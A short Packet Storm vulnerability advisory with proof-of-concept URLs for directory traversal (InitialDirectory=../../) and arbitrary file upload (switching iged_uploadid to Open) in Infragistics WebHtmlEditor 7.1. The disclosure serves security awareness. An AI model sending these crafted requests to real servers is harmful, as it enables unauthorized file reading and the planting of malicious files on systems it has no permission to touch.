Infragistics WebHtmlEditor version 7.1 suffers from arbitrary file upload and directory traversal vulnerabilities.
8ff8e58ef85c67752c5351ccf99a194b4d12e3f6535851aaa8c92621b6b88fe6-----------------------------------------------------------------------------------------------------------------------------
Infragistics WebHtmlEditor.v7.1(InitialDirectory,iged_uploadid ) directory Traversal and Arbitrary File upload vulnerability
-----------------------------------------------------------------------------------------------------------------------------
proof of concept by KyoungChip, Jang ( SpeeDr00t )
[*] the bug
: directory Traversal and Arbitrary File upload vulnerability
[*] application
: Infragistics WebHtmlEditor.v7.1
[*] Vendor URL
: http://www.infragistics.com
[*] homepage
: cafe.naver.com/cwithme
[*] company
: sk юн4sec
[*] Group
: canvasTeam@SpeeDr00t
[*] Thank for
: my wife(en hee) , my son(ju en, do en ), Zero-0x77, hoon
# directory Traversal vulnerability
A directory traversal vulnerability exists in Infragistics WebHtmlEditor.v7.1
which allows a remote user to view files local to the target server.
The parameters of the InitialDirectory ( InitialDirectory =../../ )
This form of attack can be manipulated directory travel.
poc ) InitialDirectory = ../../
ex)
http://server/test.aspx?lang=&iged_uploadid=InsertImage&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor
# Arbitrary File upload vulnerability
The parameters of the InsertImage the iged_uploadid can upload image files, but
Open an attacker to change the parameters iged_uploadid Arbitrary File upload it enables.
http://server/test.aspx?lang=&iged_uploadid=Open&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed